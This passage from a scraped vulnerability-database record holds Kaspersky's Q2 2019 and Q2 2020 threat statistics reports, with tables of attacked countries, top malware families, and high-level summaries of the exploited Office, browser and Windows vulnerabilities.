Backdoor.Linux.Gafgyt.az | 2.45 \n8 | Backdoor.Linux.Mirai.h | 1.38 \n9 | Backdoor.Linux.Mirai.c | 1.36 \n10 | Backdoor.Linux.Gafgyt.av | 1.26 \n \n_* Share of malware type in the total amount of malware downloaded to IoT devices via successful telnet attacks_\n\nAs things stand, there is no reason to expect a change in the situation with Mirai, which remains the most popular malware family with cybercriminals attacking IoT devices.\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab SSH traps, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153622/it-threat-evolution-q2-2019-statistics-12.png>)\n\n#### **Top 10 countries by location of devices from which attacks were made on Kaspersky Lab SSH traps**\n\n| Country | % \n---|---|--- \n1 | Vietnam | 15.85 \n2 | China | 14.51 \n3 | Egypt | 12.17 \n4 | Brazil | 6.91 \n5 | Russia | 6.66 \n6 | US | 5.05 \n7 | Thailand | 3.76 \n8 | Azerbaijan | 3.62 \n9 | India | 2.43 \n10 | France | 2.12 \n \nIn Q2 2019, the Top 3 countries by number of devices attacking Kaspersky Lab traps using the SSH protocol were Vietnam (15.85%), China (14.51%), and Egypt (12.17%). The US (5.05%), which took second place in Q1 2019, dropped down to seventh.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2019, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 228,206 users.\n\n_Number of unique users attacked by financial malware, Q2 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153645/it-threat-evolution-q2-2019-statistics-13.png>)\n\n### Attack geography\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153713/it-threat-evolution-q2-2019-statistics-14.png>)\n\n#### Top 10 countries by share of attacked users\n\n| **Country*** | **%**** \n---|---|--- \n1 | Belarus | 2.0 \n2 | Venezuela | 1.8 \n3 | China | 1.6 \n4 | Indonesia | 1.3 \n5 | South Korea | 1.3 \n6 | Cyprus | 1.2 \n7 | Paraguay | 1.2 \n8 | Russia | 1.2 \n9 | Cameroon | 1.1 \n10 | Serbia | 1.1 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n#### Top 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | RTM | Trojan-Banker.Win32.RTM | 32.2 | \n2 | Zbot | Trojan.Win32.Zbot | 23.3 | \n3 | Emotet | Backdoor.Win32.Emotet | 8.2 | \n4 | Nimnul | Virus.Win32.Nimnul | 6.4 | \n5 | Trickster | Trojan.Win32.Trickster | 5.0 | \n6 | Nymaim | Trojan.Win32.Nymaim | 3.5 | \n7 | SpyEye | Backdoor.Win32.SpyEye | 3.2 | \n8 | Neurevt | Trojan.Win32.Neurevt | 2.8 | \n9 | IcedID | Trojan-Banker.Win32.IcedID | 1.2 | \n10 | Gozi | Trojan.Win32.Gozi | 1.1 | \n \n_** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q2 2019, the Top 3 remained unchanged compared to the previous quarter. The leading positions in our Top 10, by a clear margin, went to the Trojan-Banker.Win32.RTM (32.2%) and Trojan.Win32.Zbot (23.3%) families. Their shares rose by 4.8 and 0.4 p.p. respectively. Behind them came the Backdoor.Win32.Emotet family (8.2%); its share, conversely, fell by 1.1 p.p. From the beginning of June, we noted a decrease in the activity of Emotet C&C servers, and by early Q3 almost all the C&C botnets were unavailable.\n\nWe also observe that in Q2 Trojan-Banker.Win32.IcedID (1.2%) and Trojan.Win32.Gozi (1.1%) appeared in the Top 10 families. They took ninth and tenth places, respectively.\n\n## Ransomware programs\n\n### Quarterly highlights\n\nAfter almost 18 months of active distribution, the team behind the GandCrab ransomware announced it was [shutting down the operation](<https://threatpost.com/gandcrab-ransomware-shutters/145267/>). According to our reports, it was one of the most common ransomware encryptors.\n\nIn Q2, distribution got underway of the new [Sodin](<https://securelist.com/sodin-ransomware/91473/>) ransomware (aka Sodinokibi or REvil), which was noteworthy for several reasons. There was the distribution method through hacking vulnerable servers, plus the use of a rare LPE exploit, not to mention the complex cryptographic scheme.\n\nAlso this quarter, there were a few high-profile ransomware infections in the computer networks of [city](<https://threatpost.com/ransomware-florida-city-pays-600k-ransom/145869/>) [administrations](<https://threatpost.com/second-florida-city-pays-hackers-500k-post-ransomware-attack/146018/>). This is not a new trend, since hacking corporate or municipal networks for extortion purposes is common enough. However, the mass nature of such incidents in recent years draws attention to the security of critical computer infrastructure, on which not only individual organizations but entire communities rely.\n\n### Number of new modifications\n\nIn Q2 2019, we identified eight new families of ransomware Trojans and detected 16,017 new modifications of these malware types. For comparison, Q1 saw 5,222 new modifications, three times fewer.\n\n_Number of new ransomware modifications, Q2 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153736/it-threat-evolution-q2-2019-statistics-15.png>)\n\nThe majority of new modifications belonged to the Trojan-Ransom.Win32.Gen family (various Trojans are automatically detected as such based on behavioral rules), as well as Trojan-Ransom.Win32.PolyRansom. The large number of PolyRansom modifications was due to the nature of this malware \u2013 it is a worm that creates numerous mutations of its own body. It substitutes these modified copies for user files, and places the victim's data inside them in encrypted form.\n\n### Number of users attacked by ransomware Trojans\n\nIn Q2 2019, Kaspersky products defeated ransomware attacks against 232,292 unique KSN users. This is 50,000+ fewer than the previous quarter.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153800/it-threat-evolution-q2-2019-statistics-16.png>)\n\nThe busiest month for protecting attacked users was April (107,653); this is even higher than the figure for March (106,519), which marks a continuation of the upward trend seen in Q1. However, in May the number of attacked users began to fall, and in June they amounted to a little over 82,000.\n\n### Attack geography\n\n_Geographical spread of countries by share of users attacked by ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153826/it-threat-evolution-q2-2019-statistics-17.png>)\n\n#### Top 10 countries attacked by ransomware Trojans\n\n| **Country*** | **% of users attacked by ransomware**** \n---|---|--- \n1 | Bangladesh | 8.81% \n2 | Uzbekistan | 5.52% \n3 | Mozambique | 4.15% \n4 | Ethiopia | 2.42% \n5 | Nepal | 2.26% \n6 | Afghanistan | 1.50% \n7 | China | 1.18% \n8 | Ghana | 1.17% \n9 | Korea | 1.07% \n10 | Kazakhstan | 1.06% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdict*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 23.37% | \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 18.73% | \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 13.83% | \n4 | (generic verdict) | Trojan-Ransom.Win32.Gen | 7.41% | \n5 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 4.73% | \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 4.15% | \n7 | Shade | Trojan-Ransom.Win32.Shade | 2.75% | \n8 | PolyRansom/VirLock | Virus.Win32.PolyRansom \nTrojan-Ransom.Win32.PolyRansom | 2.45% | \n9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 1.31% | \n10 | Cryakl | Trojan-Ransom.Win32.Cryakl | 1.24% | \n| | | | | \n \n_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to provide statistical data._ \n_** Unique Kaspersky users attacked by a particular family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new modifications\n\nIn Q2 2019, Kaspersky solutions detected 7,156 new modifications of miners, almost 5,000 fewer than in Q1.\n\n_Number of new miner modifications, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153850/it-threat-evolution-q2-2019-statistics-18.png>)\n\nThe largest number of new modifications was detected in April (3,101). This is also nearly 1,000 more than in March 2019, but, on average, new miner modifications are appearing less and less.\n\n### Number of users attacked by miners\n\nIn Q2, we detected attacks using miners on the computers of 749,766 unique users of Kaspersky products worldwide.\n\n_Number of unique users attacked by miners, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153917/it-threat-evolution-q2-2019-statistics-19.png>)\n\nThroughout the quarter, the number of attacked users gradually decreased \u2013 from 383,000 in April to 318,000 in June.\n\n### Attack geography\n\n_Geographical spread of countries by share of users attacked by miners, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153944/it-threat-evolution-q2-2019-statistics-20.png>)\n\n**Top 10 countries by share of users attacked by miners**\n\n| **Country*** | **% of users attacked by miners**** \n---|---|--- \n1 | Afghanistan | 10.77% \n2 | Ethiopia | 8.99% \n3 | Uzbekistan | 6.83% \n4 | Kazakhstan | 4.76% \n5 | Tanzania | 4.66% \n6 | Vietnam | 4.28% \n7 | Mozambique | 3.97% \n8 | Ukraine | 3.08% \n9 | Belarus | 3.06% \n10 | Mongolia | 3.06% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyber attacks\n\nOver the past year, the Microsoft Office suite has topped our breakdown of the most attacked applications. Q2 2019 was no exception \u2013 the share of exploits for vulnerabilities in Microsoft Office applications rose from 67% to 72%. The reason for the growth was primarily the incessant mass spam mailings distributing documents with exploits for the [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), [CVE-2018-0798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0798>), and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) vulnerabilities. These vulnerabilities exploit stack overflow due to bugs in object processing to remotely execute code for the Equation Editor component in Microsoft Office. Other Office vulnerabilities such as [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>) and [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>) are also popular with cybercriminals.\n\nThe increasing popularity of exploits for Microsoft Office suggests that cybercriminals see it as the easiest and fastest way to deploy malware on victim computers. In other words, these exploits are more likely to succeed, since their format enables the use of various techniques for bypassing static detection tools, and their execution is hidden from users and requires no additional actions, such as running macros.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154007/it-threat-evolution-q2-2019-statistics-21.png>)\n\nThe share of detected exploits for vulnerabilities in different web browsers in Q2 amounted to 14%, five times less than the share of exploits for Microsoft Office. Most browser vulnerabilities are the result of errors in just-in-time code compilation, as well as during various stages of code optimization, since the logic of these processes is complex and demands special attention from developers. Insufficient checks for potential modification of data or data types during such processing, when it is not expected by the compiler/optimizer, often give rise to new vulnerabilities. Other common errors that can lead to remote code execution in web browsers are data type overflow, freed memory usage, and incorrect use of types. Perhaps the most interesting example this quarter was a zero-day exploit targeted at employees of [Coinbase](<https://www.zdnet.com/article/firefox-zero-day-was-used-in-attack-against-coinbase-employees-not-its-users/>) and a number of other organizations. Found in the wild, it utilized two vulnerabilities at once, [CVE-2019-11707](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-18/>) and [CVE-2019-11708](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-19/>), for remote code execution in Mozilla Firefox.\n\nOn the topic of zero-days, the release in Q2 of exploit code by a security researcher under the pseudonym SandboxEscaper is worth noting. The set of exploits, named PolarBear, elevates privileges under Windows 10 and targets the following vulnerabilities: [CVE-2019-1069](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1069>), [CVE-2019-0863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0863>), [CVE-2019-0841](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0841>), and [CVE-2019-0973](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0973>).\n\nThe share of network attacks continued to grow in Q2. Cybercriminals did not abandon EternalBlue-based attacks on systems with an unpatched SMB subsystem, and were active in bringing new vulnerabilities on stream in network applications such as [Oracle WebLogic](<https://securelist.com/sodin-ransomware/91473/>). A separate note goes to the ongoing password attacks on Remote Desktop Protocol and Microsoft SQL Server. However, the greatest danger for many users came from the [CVE-2019-0708](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>) vulnerability, found in Q2, in the remote desktop subsystem for Windows XP, Windows 7, and Windows Server 2008. It can be used by cybercriminals to gain remote control over vulnerable computers, and create a network worm not unlike the [WannaCry ransomware](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>). Insufficient scanning of incoming packets allows an attacker to implement a use-after-free script and overwrite data in the kernel memory. Note that exploitation of this attack does not require access to a remote account, as it takes place at the authorization stage before the username and password are checked.\n\n### Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n#### Countries that are sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q2 2019, Kaspersky solutions defeated **717,057,912** attacks launched from online resources located in 203 countries across the globe. **217,843,293** unique URLs triggered Web Anti-Virus components.\n\n_Distribution of web-based attack sources by country, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154032/it-threat-evolution-q2-2019-statistics-22.png>)\n\nThis quarter, Web Anti-Virus was most active on resources located in the US. Overall, the Top 4 remained unchanged from the previous quarter.\n\n#### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious objects that fall under the Malware class; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Algeria | 20.38 \n2 | Venezuela | 19.13 \n3 | Albania | 18.30 \n4 | Greece | 17.36 \n5 | Moldova | 17.30 \n6 | Bangladesh | 16.82 \n7 | Estonia | 16.68 \n8 | Azerbaijan | 16.59 \n9 | Belarus | 16.46 \n10 | Ukraine | 16.18 \n11 | France | 15.84 \n12 | Philippines | 15.46 \n13 | Armenia | 15.40 \n14 | Tunisia | 15.29 \n15 | Bulgaria | 14.73 \n16 | Poland | 14.69 \n17 | R\u00e9union | 14.68 \n18 | Latvia | 14.65 \n19 | Peru | 14.50 \n20 | Qatar | 14.32 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 12.12% of Internet user computers worldwide experienced at least one Malware-class attack during the quarter.\n\n_Geography of malicious web-based attacks, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154059/it-threat-evolution-q2-2019-statistics-23.png>)\n\n### Local threats\n\n_Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q2 2019, our File Anti-Virus detected **240,754,063** malicious and potentially unwanted objects.\n\n#### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that as of this quarter, the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 55.43 \n2 | Tajikistan | 55.27 \n3 | Uzbekistan | 55.03 \n4 | Yemen | 52.12 \n5 | Turkmenistan | 50.75 \n6 | Laos | 46.12 \n7 | Syria | 46.00 \n8 | Myanmar | 45.61 \n9 | Mongolia | 45.59 \n10 | Ethiopia | 44.95 \n11 | Bangladesh | 44.11 \n12 | Iraq | 43.79 \n13 | China | 43.60 \n14 | Bolivia | 43.47 \n15 | Vietnam | 43.22 \n16 | Venezuela | 42.71 \n17 | Algeria | 42.33 \n18 | Cuba | 42.31 \n19 | Mozambique | 42.14 \n20 | Rwanda | 42.02 \n \n_These statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera memory cards, phones, or external hard drives._\n\n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local threats, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154126/it-threat-evolution-q2-2019-statistics-24.png>)\n\nOverall, 22.35% of user computers globally faced at least one **Malware-class** local threat during Q2.\n\nThe figure for Russia was 26.14%.", "cvss3": {}, "published": "2019-08-19T10:00:00", "type": "securelist", "title": "IT threat evolution Q2 2019. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0798", "CVE-2018-0802", "CVE-2019-0708", "CVE-2019-0841", "CVE-2019-0863", "CVE-2019-0973", "CVE-2019-10149", "CVE-2019-1069", "CVE-2019-11707", "CVE-2019-11708"], "modified": "2019-08-19T10:00:00", "id": "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "href": "https://securelist.com/it-threat-evolution-q2-2019-statistics/92053/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-03T13:05:29", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22101624/malware_SL_pic3-990x400.jpg)\n\n**[IT threat evolution Q2 2020. Review](<https://securelist.com/it-threat-evolution-q2-2020/98230/>) \n[IT threat evolution Q2 2020. Mobile statistics](<https://securelist.com/it-threat-evolution-q2-2020-mobile-statistics/98337/>)**\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q2:\n\n * Kaspersky solutions blocked 899,744,810 attacks launched from online resources in 191 countries across the globe.\n * As many as 286,229,445 unique URLs triggered Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 181,725 unique users.\n * Ransomware attacks were defeated on the computers of 154,720 unique users.\n * Our File Anti-Virus detected 80,993,511 unique malware and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2020, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 181,725 users.\n\n_Number of unique users attacked by financial malware, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105102/16-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Geography of attacks**\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of financial malware attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105134/17-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 7.5 \n2 | Uzbekistan | 5.7 \n3 | Tajikistan | 5.6 \n4 | Afghanistan | 2.6 \n5 | Macedonia | 2.6 \n6 | Yemen | 2.2 \n7 | Syria | 1.9 \n8 | Kazakhstan | 1.7 \n9 | Cyprus | 1.7 \n10 | Iran | 1.5 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000). \n** Unique users of Kaspersky products whose computers were targeted by financial malware as a share of all unique users of Kaspersky products in the country._\n\nAmong the banking Trojan families, the share of Backdoor.Win32.Emotet decreased markedly from 21.3% to 6.6%. This botnet's activity decreased at the end of Q1 2020, but the results only became clear in the second quarter. However, as we prepared this report, we noticed that Emotet was gradually recovering.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 24.8 | \n2 | RTM | Trojan-Banker.Win32.RTM | 18.6 | \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 15.4 | \n4 | Emotet | Backdoor.Win32.Emotet | 6.6 | \n5 | Trickster | Trojan.Win32.Trickster | 4.7 | \n6 | Nimnul | Virus.Win32.Nimnul | 4.3 | \n7 | Danabot | Trojan-Banker.Win32.Danabot | 3.4 | \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.0 | \n9 | Nymaim | Trojan.Win32.Nymaim | 2.5 | \n10 | Neurevt | Trojan.Win32.Neurevt | 1.4 | \n \n_** Unique users attacked by this __malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trend highlights\n\nThe attackers behind the Shade ransomware announced that they had ceased to distribute the Trojan. In addition, they published keys to decrypt files affected by all of its versions. The number of keys that had been accumulated over the years exceeded 750,000, and we [updated](<https://www.kaspersky.com/blog/shade-decryptor-2020/35246/>) our ShadeDecryptor utility to help Shade victims to regain access to their data.\n\nRansomware written in Go began surfacing more often than before. Examples of recently discovered Trojans include Sorena, Smaug, Hydra, Satan/M0rphine, etc. What is this: hackers showing an interest in new technology, ease of development or an attempt at making researchers' work harder? No one knows for sure.\n\n### Number of new modifications\n\nWe detected five new ransomware families and 4,406 new modifications of these malware programs in Q2 2020.\n\n_Number of new ransomware modifications detected, Q2 2019 \u2013 Q1 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105223/sl_malware_q2_pc_03_18-malware_q2-2020_stats_non-mobile.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nKaspersky products and technologies protected 154,720 users from ransomware attacks in Q2 2020.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105258/19-en-malware_q2-2020_stats_non-mobile.png>))_\n\n### Geography of attacks\n\n_Geography of attacks by ransomware Trojans, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105418/20-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.69% \n2 | Mozambique | 1.16% \n3 | Uzbekistan | 1.14% \n4 | Egypt | 0.97% \n5 | Ethiopia | 0.94% \n6 | China | 0.74% \n7 | Afghanistan | 0.67% \n8 | Pakistan | 0.57% \n9 | Vietnam | 0.55% \n10 | Mongolia | 0.49% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). \n** Unique users whose computers were attacked by Trojan encryptors as a share of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 14.74% | \n2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.42% | \n3 | (generic verdict) | Trojan-Ransom.Win32.Generic | 7.47% | \n4 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 7.11% | \n5 | Stop | Trojan-Ransom.Win32.Stop | 7.06% | \n6 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 4.68% | \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.28% | \n8 | (generic verdict) | Trojan-Ransom.Win32.Phny | 3.29% | \n9 | Cerber | Trojan-Ransom.Win32.Zerber | 2.19% | \n10 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 2.16% | \n| | | | | \n \n_* Unique Kaspersky users attacked by the specified family of ransomware Trojans as a percentage of all users __attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new modifications\n\nKaspersky solutions detected 3,672 new miner modifications in Q2 2020, which is several dozen times fewer than in the previous quarter.\n\n_Number of new miner modifications, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105534/21-en-malware_q2-2020_stats_non-mobile.png>))_\n\nThe difference can be explained by thousands of modifications of one miner family, which were detected in the first quarter. In the quarter under review, that miner's activity dwindled, which is reflected in the statistics.\n\n### Number of users attacked by miners\n\nWe detected miner attacks on the computers of 440,095 unique Kaspersky users worldwide in Q2 2020. This type of threats shows a clear downward trend.\n\n_Number of unique users attacked by miners, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105631/22-en-malware_q2-2020_stats_non-mobile.png>))_\n\n### Geography of attacks\n\n_Geography of miner attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105702/23-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 4.08% \n2 | Ethiopia | 4.04% \n3 | Uzbekistan | 2.68% \n4 | Tanzania | 2.57% \n5 | Vietnam | 2.17% \n6 | Rwanda | 2.11% \n7 | Kazakhstan | 2.08% \n8 | Sri Lanka | 1.97% \n9 | Mozambique | 1.78% \n10 | Belarus | 1.41% \n \n_* Excluded are countries with relatively few Kaspersky product users (under 50,000). \n** Unique users whose computers were attacked by miners as a share of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\nExploit distribution statistics for Q2 2020, as before, show that vulnerabilities in the Microsoft Office suite are the most common ones. However, their share decreased to 72% in the last quarter. The same vulnerabilities we had seen before still topped the list. [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), which allows inserting a malicious script into an OLE object placed inside an Office document, was the most commonly exploited vulnerability. It was followed by the Q1 favorite, [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>). This vulnerability exploits a stack overflow error in the Equation Editor component of the Office suite. CVE-2017-8570, a vulnerability similar to [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>), came third. The remaining positions on the TOP 5 list were occupied by [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-8759.](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>)\n\nThe second category (exploits for popular browsers) accounted for about 12% in Q2, its share increasing slightly when compared to the previous period. During the reporting period, cybercriminals attacked Firefox using the [CVE-2020-6819](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6819>) vulnerability, which allows malicious code to be executed when an HTTP header is parsed incorrectly. Exploits that use the vulnerabilities in the ReadableStream interface, such as [CVE-2020-6820](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6820>), have been observed as well. No major vulnerability exploited to spread malware was observed during the reporting period for any of the other popular browsers: Google Chrome, Microsoft Edge, or Internet Explorer. However, fixes for a number of vulnerabilities that could potentially have been used for creating exploits, but were detected by researchers in time, were announced to software manufacturers.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105735/sl_malware_q2_pc_09_24-malware_q2-2020_stats_non-mobile.png>))_\n\nThe first quarter set a trend for researching font and other graphic primitives subsystems in Windows. In Q2, two vulnerabilities were discovered in Windows Codecs Library, assigned [CVE-2020-1425](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1425>) and [CVE-2020-1457](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1457>) codes. Both were fixed, and neither is known to have been exploited in the wild. Another interesting vulnerability fixed in the last quarter is [CVE-2020-1300.](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1300>) It allows for remote execution of code due to incorrect processing of Cabinet files, for example, if the user is trying to run a malicious CAB file pretending to be a printer driver. Notably, the [CVE-2020-1299](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1299>) vulnerability allowed the attacker to execute arbitrary code with the user's privileges by generating a specially formatted LNK file.\n\nThe trend for brute-forcing of Remote Desktop Services, Microsoft SQL Services and SMB access passwords persisted in Q2 